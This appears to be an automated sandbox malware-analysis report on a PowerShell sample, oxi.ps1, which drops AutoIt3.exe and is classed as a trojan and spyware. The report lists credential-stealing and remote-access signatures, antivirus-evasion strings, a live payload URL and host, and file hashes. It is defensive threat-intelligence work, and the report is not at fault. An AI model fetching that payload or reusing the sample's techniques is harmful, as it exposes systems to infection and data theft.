            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll | VolumeInformation
Source: C:\downloads\Autoit3.exe | Code function: 3_2_00840030 GetLocalTime,__swprintf, | 3_2_00840030
Source: C:\downloads\Autoit3.exe | Code function: 3_2_00840722 GetUserNameW, | 3_2_00840722
Source: C:\downloads\Autoit3.exe | Code function: 3_2_0083416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, | 3_2_0083416A
Source: C:\downloads\Autoit3.exe | Code function: 3_2_00815D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, | 3_2_00815D13
Source: Autoit3.exe, Autoit3.exe, 00000003.00000002.1742650595.00000000038A8000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000003.00000002.1742451571.000000000379C000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: mcshield.exe
Source: Autoit3.exe, Autoit3.exe, 00000003.00000002.1742650595.00000000038A8000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000003.00000002.1742451571.000000000379C000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: superantispyware.exe

            Stealing of Sensitive Information

Source: Yara match | File source: 00000003.00000002.1742650595.0000000003919000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1743157154.0000000003D2E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1742451571.000000000379C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Autoit3.exe PID: 7524, type: MEMORYSTR
Source: Yara match | File source: 00000003.00000002.1742650595.00000000038A8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1742451571.000000000379C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Autoit3.exe PID: 7524, type: MEMORYSTR
Source: Autoit3.exe | Binary or memory string: WIN_81
Source: Autoit3.exe | Binary or memory string: WIN_XP
Source: Autoit3.exe | Binary or memory string: WIN_XPe
Source: Autoit3.exe | Binary or memory string: WIN_VISTA
Source: Autoit3.exe | Binary or memory string: WIN_7
Source: Autoit3.exe | Binary or memory string: WIN_8
Source: Autoit3.exe.0.dr | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

Source: Yara match | File source: 00000003.00000002.1742650595.0000000003919000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1743157154.0000000003D2E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1742451571.000000000379C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Autoit3.exe PID: 7524, type: MEMORYSTR
Source: C:\downloads\Autoit3.exe | Code function: 3_2_0087696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, | 3_2_0087696E
Source: C:\downloads\Autoit3.exe | Code function: 3_2_00876E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, | 3_2_00876E32
Source: C:\downloads\Autoit3.exe | Code function: 3_2_03CDB420 bind, | 3_2_03CDB420
MITRE ATT&CK Matrix (tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact; the per-tactic technique cells and their signature counts did not survive extraction of the flattened table)
Source | Detection | Scanner | Label
oxi.ps1 | 12% | Virustotal
Source | Detection | Scanner | Label
C:\downloads\Autoit3.exe | 100% | Joe Sandbox ML
C:\downloads\Autoit3.exe | 3% | ReversingLabs
C:\downloads\Autoit3.exe | 4% | Virustotal
No Antivirus matches
Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
https://aka.ms/winsvr-2022-pshelp | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware
http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://aka.ms/winsvr-2022-pshelpX | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://www.autoitscript.com/autoit3/J | 0% | Avira URL Cloud | safe
https://kostumn1.ilabsX | 0% | Avira URL Cloud | safe
http://kostumn1.ilabserver.com | 0% | Avira URL Cloud | safe
https://kostumn1.ilabserver.com | 0% | Avira URL Cloud | safe
https://www.autoitscript.com/autoit3/ | 0% | Avira URL Cloud | safe
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
https://kostumn1.ilabserver.com/1.zip | 0% | Avira URL Cloud | safe
http://www.autoitscript.com/autoit3/J | 0% | Virustotal
https://kostumn1.ilabserver.com | 0% | Virustotal
https://www.autoitscript.com/autoit3/ | 0% | Virustotal
https://github.com/Pester/Pester | 1% | Virustotal
https://kostumn1.ilabserver.com/1.zip | 0% | Virustotal
Name | IP | Active | Malicious | Antivirus Detection | Reputation
kostumn1.ilabserver.com | 167.235.238.203 | true | false | (none) | unknown
Name | Malicious | Antivirus Detection | Reputation
https://kostumn1.ilabserver.com/1.zip | false | 0% Virustotal; Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.autoitscript.com/autoit3/J | Autoit3.exe, 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp, Autoit3.exe.0.dr | false | 0% Virustotal; Avira URL Cloud: safe | unknown
http://kostumn1.ilabserver.com | powershell.exe, 00000000.00000002.1778733653.0000024DCBAEC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000000.00000002.1794320678.0000024DDA024000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000000.00000002.1778733653.0000024DCA454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1778733653.0000024DCB14D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000000.00000002.1778733653.0000024DCA1D7000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000000.00000002.1778733653.0000024DCA454000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000000.00000002.1778733653.0000024DCA1D7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://go.micro | powershell.exe, 00000000.00000002.1778733653.0000024DCBC11000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000000.00000002.1778733653.0000024DCA454000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000000.00000002.1794320678.0000024DDA024000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000000.00000002.1794320678.0000024DDA024000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000000.00000002.1794320678.0000024DDA024000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000000.00000002.1794320678.0000024DDA024000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/winsvr-2022-pshelpX | powershell.exe, 00000000.00000002.1778733653.0000024DCB467000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://kostumn1.ilabsX | powershell.exe, 00000000.00000002.1778733653.0000024DCB76C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000000.00000002.1778733653.0000024DC9FB1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://kostumn1.ilabserver.com | powershell.exe, 00000000.00000002.1778733653.0000024DCA1D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1778733653.0000024DCB76C000.00000004.00000800.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://www.autoitscript.com/autoit3/ | powershell.exe, 00000000.00000002.1778733653.0000024DCAAE6000.00000004.00000800.00020000.00000000.sdmp, Autoit3.exe.0.dr | false | 0% Virustotal; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.1778733653.0000024DC9FB1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000000.00000002.1778733653.0000024DCA1D7000.00000004.00000800.00020000.00000000.sdmp | false | 1% Virustotal; Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
167.235.238.203 | kostumn1.ilabserver.com | United States | 3525 | ALBERTSONSUS | false
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1448082
              Start date and time:2024-05-27 18:28:05 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 5m 33s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:10
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:oxi.ps1
              Detection:MAL
              Classification:mal100.troj.spyw.evad.winPS1@11/12@1/1
              EGA Information:
              • Successful, ratio: 50%
              HCA Information:
              • Successful, ratio: 99%
              • Number of executed functions: 100
              • Number of non-executed functions: 307
              Cookbook Comments:
              • Found application associated with file extension: .ps1
              • Stop behavior analysis, all processes terminated
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Execution Graph export aborted for target powershell.exe, PID 7276 because it is empty
              • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size getting too big, too many NtCreateKey calls found.
Time | Type | Description
12:28:57 | API Interceptor | 45x Sleep call for process: powershell.exe modified
12:29:01 | API Interceptor | 1x Sleep call for process: WMIC.exe modified
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ALBERTSONSUS | https://www.google.com/url?sa=t&source=web&rct=j&opi=89978449&url=https://alsamah.ae/products/&ved=2ahUKEwjF9YHzr6WGAxW4EFkFHSf6BdcQjBB6BAgVEAE&usg=AOvVaw3Td0ZMPQIvFh2L-u6lkLFb | malicious | Unknown | 167.235.182.180
ALBERTSONSUS | https://goo.su/l1bfUYR | malicious | Unknown | 167.235.33.115
ALBERTSONSUS | 0Vjz9RSZxz.elf | malicious | Mirai | 167.234.240.200
ALBERTSONSUS | https://usedlpgtank.com/.usaru/asif.hussain@mpft.nhs.uk | malicious | Unknown | 167.235.115.8
ALBERTSONSUS | AudioTranscript_448.html | malicious | HTMLPhisher | 167.235.115.8
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | http://see-track.com/ | malicious | Unknown | 167.235.238.203
3b5074b1b5d032e5620f69f9f700ff0e | Doc_10577030xls.exe | malicious | AgentTesla, PureLog Stealer | 167.235.238.203
3b5074b1b5d032e5620f69f9f700ff0e | http://154.29.75.236 | malicious | Unknown | 167.235.238.203
3b5074b1b5d032e5620f69f9f700ff0e | kam.vbs | malicious | Unknown | 167.235.238.203
3b5074b1b5d032e5620f69f9f700ff0e | las.vbs | malicious | Unknown | 167.235.238.203
3b5074b1b5d032e5620f69f9f700ff0e | upload.vbs | malicious | Unknown | 167.235.238.203
3b5074b1b5d032e5620f69f9f700ff0e | Copy#51007602.exe | malicious | AgentTesla, PureLog Stealer | 167.235.238.203
3b5074b1b5d032e5620f69f9f700ff0e | yk4ABozmBY.exe | malicious | RedLine | 167.235.238.203
3b5074b1b5d032e5620f69f9f700ff0e | Doc100057638xls.exe | malicious | AgentTesla, PureLog Stealer | 167.235.238.203
3b5074b1b5d032e5620f69f9f700ff0e | 0000003448.pdf.exe | malicious | AgentTesla | 167.235.238.203
Match | Associated Sample Name / URL | Detection | Threat Name
C:\downloads\Autoit3.exe | OSE - PO & FCST - ___-LT24052303183991-01.exe | malicious | Remcos
C:\downloads\Autoit3.exe | file.exe | malicious | Vidar
C:\downloads\Autoit3.exe | umkglnks.ps1 | malicious | DarkGate, MailPassView
C:\downloads\Autoit3.exe | 1.hta | malicious | DarkGate, MailPassView
C:\downloads\Autoit3.exe | AutoIt_Dropper.exe | malicious | Unknown
C:\downloads\Autoit3.exe | AutoIt_Dropper.exe | malicious | Unknown
C:\downloads\Autoit3.exe | 08-May-24-document-38438dbb.jar | malicious | DarkGate, MailPassView
C:\downloads\Autoit3.exe | 08-May-24-document-38438dbb.jar | malicious | DarkGate, MailPassView
C:\downloads\Autoit3.exe | yyyyyyyyyyyy.msg | malicious | DarkGate, MailPassView
C:\downloads\Autoit3.exe | Phish Alert EXTERNAL SUSPECTED SPAM Re RFQ for SMART 924.msg | malicious | DarkGate, MailPassView
                                  Process:C:\Windows\SysWOW64\cmd.exe
                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):42
                                  Entropy (8bit):2.9625983186791407
                                  Encrypted:false
                                  SSDEEP:3:Qh9eolFl+KQFltYn:Q7eY+H2n
                                  MD5:78962895178327D50EBFC5D7249F00C0
                                  SHA1:32695F4C78C6428A570B9EA30F54C7CB8DF84E9C
                                  SHA-256:058BDCFD2A3BCC6D12E2BC797C3CF818666B9EA192162991F48F86653198EB5D
                                  SHA-512:6D61EBE2C7CE94124288A1FE1085AFBC1C921C3814BCD394D397C8EEF0A7043F934CA250FF4192C7D456191BF4EA95F02E30AE880324BE86C889BCCADA180E5F
                                  Malicious:false
                                  Reputation:low
                                  Preview:..D.o.m.a.i.n. . .....w.A.c.2.O. . . .....
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):1744
                                  Entropy (8bit):5.371786303518436
                                  Encrypted:false
                                  SSDEEP:48:tSU4y4RQmFoUeCamfm9qr9tK8NfUNkw6nUZ49ER/G+RKw:EHyIFKL2O9qr2KfJwf5nP
                                  MD5:676D0B6FFC5872EC4168B4222E7BD9C6
                                  SHA1:90645B3DF9F77A89BCAC3DE41CC785F235090C10
                                  SHA-256:5EA452F6E1E1D78FC486B7A803B442AF6E67C6256FE5309B5475C32A5484815E
                                  SHA-512:57C98AFF48234AE9EB8D3B53E77C958E8FB755C25CD002F9A7D994A20FC03EC0A6CB21CC0593F9A2DBD761FA7601D576221737549A179BAE3419D38D3A5FCB0B
                                  Malicious:false
                                  Reputation:low
                                  Preview:@...e...........)... ................................@..........@...............|.jdY\.H.s9.!..|(.......System.IO.Compression...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\downloads\Autoit3.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):32
                                  Entropy (8bit):3.6167292966721747
                                  Encrypted:false
                                  SSDEEP:3:Dm3N65L/DjAaCN:7ZDjAaCN
                                  MD5:45D97490CD299A3AE4D58E6C68FC11F1
                                  SHA1:1F3FB31C08EEA1FDB68786E9DEB18BECC3C16BE7
                                  SHA-256:D35EEC6EE290BFA7655624538E6ABE2C6406D2B69B76FB5032068D4DEF80265E
                                  SHA-512:8139E212D0DEA16B9585D48B7C43AAD577CE4D613497BB9AF247D380B58C45DF8EF64F116393ECBAA57DB054CA9E2898B70D82F69DB7E079ABFBB38AADEB25DA
                                  Malicious:false
                                  Preview:EcCdAahBABEGcFeFFcahHfBFBeGEcbGh
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):6221
                                  Entropy (8bit):3.7387171969118076
                                  Encrypted:false
                                  SSDEEP:96:wQyyyk33CxH3NlBkvhkvCCtfEtqaYlbHIEtqajlbHf:wQyyykyXNvfEtWiEtpp
                                  MD5:9E2B8621C070F4E9598C9B91A970DFF3
                                  SHA1:326B33AFEC0500086B44B901096331C25761B577
                                  SHA-256:E06B1175966F671202E2AA752F99608E549BAD2FE42EF9ABEFC4A44D2BA4FCEE
                                  SHA-512:62FBC14E82EF08BC24E50BC4F0AE6D98B67DC6E6917631F837FB334F0DFD241EDDB18BC714B98FF5D00F016AAADD80AE945AB98DA77227DC0980F4712E3681BB
                                  Malicious:false
                                  Preview:...................................FL..................F.".. ...-/.v.......R...z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.......R...:e..R.......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X.............................%..A.p.p.D.a.t.a...B.V.1......X....Roaming.@......CW.^.X.............................X..R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.X............................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..........................h...W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.X......Q...........
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):6221
                                  Entropy (8bit):3.7387171969118076
                                  Encrypted:false
                                  SSDEEP:96:wQyyyk33CxH3NlBkvhkvCCtfEtqaYlbHIEtqajlbHf:wQyyykyXNvfEtWiEtpp
                                  MD5:9E2B8621C070F4E9598C9B91A970DFF3
                                  SHA1:326B33AFEC0500086B44B901096331C25761B577
                                  SHA-256:E06B1175966F671202E2AA752F99608E549BAD2FE42EF9ABEFC4A44D2BA4FCEE
                                  SHA-512:62FBC14E82EF08BC24E50BC4F0AE6D98B67DC6E6917631F837FB334F0DFD241EDDB18BC714B98FF5D00F016AAADD80AE945AB98DA77227DC0980F4712E3681BB
                                  Malicious:false
                                  Preview:...................................FL..................F.".. ...-/.v.......R...z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.......R...:e..R.......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X.............................%..A.p.p.D.a.t.a...B.V.1......X....Roaming.@......CW.^.X.............................X..R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.X............................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..........................h...W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.X......Q...........
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):893608
                                  Entropy (8bit):6.620131693023677
                                  Encrypted:false
                                  SSDEEP:12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
                                  MD5:C56B5F0201A3B3DE53E561FE76912BFD
                                  SHA1:2A4062E10A5DE813F5688221DBEB3F3FF33EB417
                                  SHA-256:237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
                                  SHA-512:195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 3%
                                  • Antivirus: Virustotal, Detection: 4%
                                  Joe Sandbox View:
                                  • Filename: OSE - PO & FCST - ___-LT24052303183991-01.exe, Detection: malicious
                                  • Filename: file.exe, Detection: malicious
                                  • Filename: umkglnks.ps1, Detection: malicious
                                  • Filename: 1.hta, Detection: malicious
